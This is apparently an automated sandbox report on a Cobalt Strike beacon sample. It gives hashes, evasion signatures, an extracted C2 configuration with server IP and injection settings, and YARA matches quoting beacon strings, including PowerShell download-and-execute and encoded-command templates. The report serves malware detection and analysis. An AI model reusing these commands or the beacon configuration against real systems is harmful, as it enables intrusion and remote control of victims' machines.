Edit tour

Windows Analysis Report
cH0s914NeF.exe

Overview

General Information

Sample name:	cH0s914NeF.exe renamed because original name is a hash value
Original sample name:	0cfc4721129ac02deb897ed2becafd9a.exe
Analysis ID:	1429067
MD5:	0cfc4721129ac02deb897ed2becafd9a
SHA1:	7cd5ee2d1b58f5a2d8ee00b2cc880df752ef0081
SHA256:	fc0e10c66b7e8f4c6d744e4c9ed4ce3407018c2b4ff71a327f5fb613d2ca3ca9
Tags:	CobaltStrikeexe
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

Yara detected Powershell download and execute

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Found API chain indicative of debugger detection

Uses known network protocols on non-standard ports

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

cH0s914NeF.exe (PID: 4304 cmdline: "C:\Users\user\Desktop\cH0s914NeF.exe" MD5: 0CFC4721129AC02DEB897ED2BECAFD9A)

conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 886, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "118.89.125.171,/ga.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2efea:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f062:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f7cc:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2fafe:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fa90:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2fafe:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f0c5:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f256:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f10b:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f149:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2fb48:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f3b6:$a11: Could not open service control manager on %s: %d 0x2f8e8:$a12: %d is an x64 process (can't inject x86 content) 0x2f918:$a13: %d is an x86 process (can't inject x64 content) 0x2fc39:$a14: Failed to impersonate logged on user %d (%u) 0x2f8a1:$a15: could not create remote thread in %d: %d 0x2f17f:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f84f:$a17: could not write to process memory: %d 0x2f3e7:$a18: Could not create service %s on %s: %d 0x2f470:$a19: Could not delete service %s on %s: %d 0x2f2d0:$a20: Could not open process token: %d (%u)
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1ad3b:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3e3c2:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16f81:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3e168:$loader_export: ReflectiveLoader 0x2efa7:$exportname: beacon.dll
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2fb48:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f918:$x2: %d is an x86 process (can't inject x64 content) 0x2fafe:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fbe2:$x4: Failed to impersonate token from %d (%u) 0x2fc39:$x5: Failed to impersonate logged on user %d (%u) 0x2efea:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x17f91:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 8B 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 C1 F1 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF 50 0x17335:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x309a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x314b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x314b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x30a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x30ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31501:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x30d6f:$a11: Could not open service control manager on %s: %d 0x312a1:$a12: %d is an x64 process (can't inject x86 content) 0x312d1:$a13: %d is an x86 process (can't inject x64 content) 0x315f2:$a14: Failed to impersonate logged on user %d (%u) 0x3125a:$a15: could not create remote thread in %d: %d 0x30b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31208:$a17: could not write to process memory: %d 0x30da0:$a18: Could not create service %s on %s: %d 0x30e29:$a19: Could not delete service %s on %s: %d 0x30c89:$a20: Could not open process token: %d (%u)
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1b8f4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17b3a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x314b7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31501:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x312d1:$x3: %d is an x86 process (can't inject x64 content) 0x30c89:$s1: Could not open process token: %d (%u) 0x309a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30d4c:$s4: Could not connect to pipe (%s): %d
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3fb21:$loader_export: ReflectiveLoader 0x30960:$exportname: beacon.dll
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x312a1:$x2: %d is an x64 process (can't inject x86 content) 0x315f2:$x3: Failed to impersonate logged on user %d (%u) 0x31501:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x314b7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x30c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31208:$s4: could not write to process memory: %d 0x309a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30d4c:$s6: Could not connect to pipe (%s): %d
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31970:$str1: %s (admin) 0x30960:$str2: beacon.dll
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31501:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x312d1:$x2: %d is an x86 process (can't inject x64 content) 0x314b7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3159b:$x4: Failed to impersonate token from %d (%u) 0x315f2:$x5: Failed to impersonate logged on user %d (%u) 0x309a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3148f:$s1: %%IMPORT%% 0x30987:$s2: www6.%x%x.%s 0x3097b:$s3: cdn.%x%x.%s 0x30c03:$s4: api.%x%x.%s 0x31970:$s5: %s (admin) 0x30c72:$s6: could not spawn %s: %d 0x31533:$s7: Could not kill %d: %d 0x30d4c:$s8: Could not connect to pipe (%s): %d 0x30994:$s9: %s.1%x.%x%x.%s 0x309a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x30b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x30ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x30bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x30bdd:$s9: %s.1%08x%08x.%x%x.%s 0x30bf2:$s9: %s.1%08x.%x%x.%s
Process Memory Space: cH0s914NeF.exe PID: 4304	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: cH0s914NeF.exe PID: 4304	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: cH0s914NeF.exe PID: 4304	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: cH0s914NeF.exe PID: 4304	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: cH0s914NeF.exe PID: 4304	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: cH0s914NeF.exe PID: 4304	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x3176:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1cfe5:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31ee:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1d05d:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3953:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x1d7c2:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x3c7b:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x1daea:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3c0d:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3c7b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x1da7c:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x1daea:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3251:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1d0c0:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33e2:$a7: could not run command (w/ token) because of its length of %d bytes! 0x1d251:$a7: could not run command (w/ token) because of its length of %d bytes! 0x3297:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1d106:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d5:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x1d144:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x3cc5:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
Process Memory Space: cH0s914NeF.exe PID: 4304	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x82b4:$loader_export: ReflectiveLoader 0x82d3:$loader_export: ReflectiveLoader 0x22123:$loader_export: ReflectiveLoader 0x22142:$loader_export: ReflectiveLoader 0x2fb3:$exportname: beacon.dll 0x313c:$exportname: beacon.dll 0x1ce22:$exportname: beacon.dll 0x1cfab:$exportname: beacon.dll
Process Memory Space: cH0s914NeF.exe PID: 4304	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x3cc5:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x1db34:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x3a9f:$x2: %d is an x86 process (can't inject x64 content) 0x1d90e:$x2: %d is an x86 process (can't inject x64 content) 0x3c7b:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x1daea:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3d5f:$x4: Failed to impersonate token from %d (%u) 0x1dbce:$x4: Failed to impersonate token from %d (%u) 0x3db6:$x5: Failed to impersonate logged on user %d (%u) 0x1dc25:$x5: Failed to impersonate logged on user %d (%u) 0x3176:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1cfe5:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.cH0s914NeF.exe.3a60000.1.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.cH0s914NeF.exe.3a60000.1.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.cH0s914NeF.exe.3a60000.1.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2efa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f01b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f785:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2fab7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fa49:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2fab7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f07e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f20f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f0c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2fb01:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f36f:$a11: Could not open service control manager on %s: %d 0x2f8a1:$a12: %d is an x64 process (can't inject x86 content) 0x2f8d1:$a13: %d is an x86 process (can't inject x64 content) 0x2fbf2:$a14: Failed to impersonate logged on user %d (%u) 0x2f85a:$a15: could not create remote thread in %d: %d 0x2f138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f808:$a17: could not write to process memory: %d 0x2f3a0:$a18: Could not create service %s on %s: %d 0x2f429:$a19: Could not delete service %s on %s: %d 0x2f289:$a20: Could not open process token: %d (%u)
0.2.cH0s914NeF.exe.3a60000.1.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1acf4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.cH0s914NeF.exe.3a60000.1.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3e37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.cH0s914NeF.exe.3a60000.1.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16f3a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.cH0s914NeF.exe.3a60000.1.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2fab7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fb01:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f8d1:$x3: %d is an x86 process (can't inject x64 content) 0x2f289:$s1: Could not open process token: %d (%u) 0x2efa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f34c:$s4: Could not connect to pipe (%s): %d
0.2.cH0s914NeF.exe.3a60000.1.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3e121:$loader_export: ReflectiveLoader 0x2ef60:$exportname: beacon.dll
0.2.cH0s914NeF.exe.3a60000.1.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2f8a1:$x2: %d is an x64 process (can't inject x86 content) 0x2fbf2:$x3: Failed to impersonate logged on user %d (%u) 0x2fb01:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2fab7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f20f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2f808:$s4: could not write to process memory: %d 0x2efa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f34c:$s6: Could not connect to pipe (%s): %d
0.2.cH0s914NeF.exe.3a60000.1.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x2ff70:$str1: %s (admin) 0x2ef60:$str2: beacon.dll
0.2.cH0s914NeF.exe.3a60000.1.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2fb01:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f8d1:$x2: %d is an x86 process (can't inject x64 content) 0x2fab7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fb9b:$x4: Failed to impersonate token from %d (%u) 0x2fbf2:$x5: Failed to impersonate logged on user %d (%u) 0x2efa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.cH0s914NeF.exe.3a60000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
